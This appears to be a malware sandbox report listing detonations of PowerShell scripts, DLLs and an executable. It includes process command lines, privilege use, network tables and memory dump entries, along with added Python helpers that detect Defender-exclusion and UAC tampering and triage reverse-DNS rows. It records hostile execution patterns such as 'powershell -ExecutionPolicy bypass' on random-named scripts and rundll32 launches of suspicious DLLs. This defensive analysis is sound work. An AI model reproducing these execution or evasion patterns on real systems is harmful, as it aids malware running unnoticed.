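    ]


if __name__ == "__main__":
    for pid, hits in analyse(sample_events()).items():
        for hit in hits:
            print(f"{pid}: {hit}")
```

The exclusion check keys on the roots rather than on `Add-MpPreference` itself, since administrators do legitimately exclude single directories; the UAC check needs the full command line, which is why `-Command` scripts are worth capturing whole rather than truncated.
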
Network

Country Destination Domain Proto
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp

Files

memory/216-2-0x00000000029E0000-0x0000000002A16000-memory.dmp

memory/216-4-0x0000000006750000-0x0000000006760000-memory.dmp

memory/216-5-0x0000000006750000-0x0000000006760000-memory.dmp

memory/216-3-0x0000000072590000-0x0000000072C7E000-memory.dmp

memory/216-6-0x0000000006D90000-0x00000000073B8000-memory.dmp

memory/216-7-0x0000000006B10000-0x0000000006B32000-memory.dmp

memory/216-8-0x00000000074C0000-0x0000000007526000-memory.dmp

memory/216-9-0x0000000006CB0000-0x0000000006D16000-memory.dmp

memory/216-10-0x00000000075F0000-0x0000000007940000-memory.dmp

memory/216-11-0x0000000007530000-0x000000000754C000-memory.dmp

memory/216-12-0x0000000007AD0000-0x0000000007B1B000-memory.dmp

memory/216-13-0x0000000007D20000-0x0000000007D96000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nyf2y54q.0jq.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/216-30-0x000000007E570000-0x000000007E580000-memory.dmp

memory/216-31-0x0000000008DA0000-0x0000000008DD3000-memory.dmp

memory/216-32-0x0000000070FB0000-0x0000000070FFB000-memory.dmp

memory/216-33-0x0000000008D80000-0x0000000008D9E000-memory.dmp

memory/216-38-0x0000000008DE0000-0x0000000008E85000-memory.dmp

memory/216-39-0x0000000006750000-0x0000000006760000-memory.dmp

memory/216-40-0x00000000090A0000-0x0000000009134000-memory.dmp

memory/216-233-0x0000000006870000-0x000000000688A000-memory.dmp

memory/216-238-0x0000000006860000-0x0000000006868000-memory.dmp

memory/216-254-0x0000000072590000-0x0000000072C7E000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

128s

Max time network

136s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Data\YXNOU01Xhpmc.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Data\YXNOU01Xhpmc.ps1

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x234

Network

Country Destination Domain Proto
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 123.10.44.20.in-addr.arpa udp

Files

memory/1376-5-0x00007FF9C4B90000-0x00007FF9C557C000-memory.dmp

memory/1376-4-0x00000114708F0000-0x0000011470912000-memory.dmp

memory/1376-6-0x0000011470960000-0x0000011470970000-memory.dmp

memory/1376-9-0x0000011470DF0000-0x0000011470E66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3riaytwg.avm.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1376-30-0x0000011470960000-0x0000011470970000-memory.dmp

memory/1376-36-0x00007FF9C4B90000-0x00007FF9C557C000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

128s

Max time network

137s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\TCLZMA64.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\TCLZMA64.dll,#1

Network

Country Destination Domain Proto
US 138.91.171.81:80 tcp
US 8.8.8.8:53 129.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 11.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:23

Platform

win10-20240221-en

Max time kernel

119s

Max time network

138s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\TCshareWin10x64.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\TCshareWin10x64.dll,#1

Network

Country Destination Domain Proto
US 20.231.121.79:80 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 169.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 189.178.17.96.in-addr.arpa udp

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

115s

Max time network

140s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Tools\dkAdSRKzVAXO.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Tools\dkAdSRKzVAXO.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 96.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 209.143.182.52.in-addr.arpa udp

Files

memory/4848-4-0x00007FFDE2120000-0x00007FFDE2B0C000-memory.dmp

memory/4848-5-0x000002ADE9E90000-0x000002ADE9EA0000-memory.dmp

memory/4848-7-0x000002ADE9E90000-0x000002ADE9EA0000-memory.dmp

memory/4848-6-0x000002ADE9EA0000-0x000002ADE9EC2000-memory.dmp

memory/4848-10-0x000002ADEA050000-0x000002ADEA0C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_edausfig.gxw.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4848-32-0x000002ADE9E90000-0x000002ADE9EA0000-memory.dmp

memory/4848-34-0x00007FFDE2120000-0x00007FFDE2B0C000-memory.dmp

memory/4848-35-0x000002ADE9E90000-0x000002ADE9EA0000-memory.dmp

memory/4848-36-0x000002ADE9E90000-0x000002ADE9EA0000-memory.dmp

memory/4848-37-0x000002ADE9E90000-0x000002ADE9EA0000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

124s

Max time network

132s

Command Line

"C:\Users\Admin\AppData\Local\Temp\data\WCMICONS.exe"

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\data\WCMICONS.exe

Processes

C:\Users\Admin\AppData\Local\Temp\data\WCMICONS.exe

"C:\Users\Admin\AppData\Local\Temp\data\WCMICONS.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 228 -s 232

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.110.86.104.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 7.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

128s

Max time network

136s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\TC7Z64.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\TC7Z64.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 129.134.221.88.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:23

Platform

win10-20240221-en

Max time kernel

121s

Max time network

140s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\TCUNZL64.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\TCUNZL64.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

117s

Max time network

143s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\Xfh5GWnGPMjT.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\Xfh5GWnGPMjT.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 96.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 85.65.42.20.in-addr.arpa udp

Files

memory/3700-4-0x000001A277410000-0x000001A277432000-memory.dmp

memory/3700-7-0x000001A2776D0000-0x000001A277746000-memory.dmp

memory/3700-8-0x00007FFC0F980000-0x00007FFC1036C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_axv4kz30.xqb.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3700-18-0x000001A277440000-0x000001A277450000-memory.dmp

memory/3700-17-0x000001A277440000-0x000001A277450000-memory.dmp

memory/3700-31-0x000001A277440000-0x000001A277450000-memory.dmp

memory/3700-34-0x00007FFC0F980000-0x00007FFC1036C000-memory.dmp

memory/3700-35-0x000001A277440000-0x000001A277450000-memory.dmp

memory/3700-36-0x000001A277440000-0x000001A277450000-memory.dmp

memory/3700-37-0x000001A277440000-0x000001A277450000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

128s

Max time network

137s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\kGCFZO6TPVYy.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\kGCFZO6TPVYy.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 131.72.42.20.in-addr.arpa udp

Files

memory/1080-4-0x00000198FE510000-0x00000198FE532000-memory.dmp

memory/1080-5-0x00007FF881A50000-0x00007FF88243C000-memory.dmp

memory/1080-6-0x00000198FE490000-0x00000198FE4A0000-memory.dmp

memory/1080-7-0x00000198FE490000-0x00000198FE4A0000-memory.dmp

memory/1080-10-0x00000198FE6C0000-0x00000198FE736000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p1jkdy1s.3q4.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1080-31-0x00000198FE490000-0x00000198FE4A0000-memory.dmp

memory/1080-35-0x00007FF881A50000-0x00007FF88243C000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

128s

Max time network

137s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 200.79.70.13.in-addr.arpa udp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:23

Platform

win10-20240221-en

Max time kernel

119s

Max time network

137s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 28.73.42.20.in-addr.arpa udp
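
Most Network rows in this report are the sandbox's own reverse lookups (PTR queries to 8.8.8.8 for `in-addr.arpa` and, in this analysis, an `ip6.arpa` name), not traffic from the sample; the rows that matter are the direct connections such as `138.91.171.81:80 tcp` under behavioral23 and `20.231.121.79:80 tcp` under behavioral25 and behavioral22. The following helper is an added example, not part of the sandbox report; it reverses the arpa labels back into addresses (including the IPv6 nibble form, which is the edge case above) and splits a table into direct connections and looked-up addresses. The sample rows are constructed from the behavioral23 and behavioral12 tables; an empty domain column stands for a row with no name.

```python
"""Split a report Network table into direct connections and sandbox reverse lookups.

Added example (not part of the sandbox report). SAMPLE_ROWS is constructed from the
behavioral23 and behavioral12 tables above.
"""
import ipaddress


def arpa_to_ip(name: str) -> str:
    """Convert a reverse-DNS name to its address; IPv4 (4 labels) and IPv6 (32 nibbles)."""
    labels = name.rstrip(".").lower().split(".")
    if labels[-2:] == ["in-addr", "arpa"] and len(labels) == 6:
        return str(ipaddress.IPv4Address(".".join(reversed(labels[:-2]))))
    if labels[-2:] == ["ip6", "arpa"] and len(labels) == 34:
        # Nibbles are listed least-significant first; reverse them into the 128-bit value.
        return str(ipaddress.IPv6Address(int("".join(reversed(labels[:-2])), 16)))
    raise ValueError(f"not a complete reverse-DNS name: {name}")


def triage(rows: list[tuple[str, str, str, str]]) -> tuple[list[str], list[str]]:
    """rows are (country, destination, domain, proto) as in the report tables."""
    direct, looked_up = [], []
    for _country, destination, domain, proto in rows:
        if proto == "udp" and destination.endswith(":53") and domain.endswith(".arpa"):
            looked_up.append(arpa_to_ip(domain))
        else:
            direct.append(f"{destination}/{proto}")
    return direct, looked_up


SAMPLE_ROWS = [
    ("US", "138.91.171.81:80", "", "tcp"),
    ("US", "8.8.8.8:53", "129.134.221.88.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "22.236.111.52.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa", "udp"),
]

if __name__ == "__main__":
    direct, looked_up = triage(SAMPLE_ROWS)
    print("direct:", direct)
    print("reverse lookups of:", looked_up)
```

The looked-up addresses are what the sandbox resolved after the fact, so they identify hosts that were contacted (or that Windows itself contacted) but not the order or the protocol; correlate them with the direct rows before treating any of them as an indicator.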

Files

N/A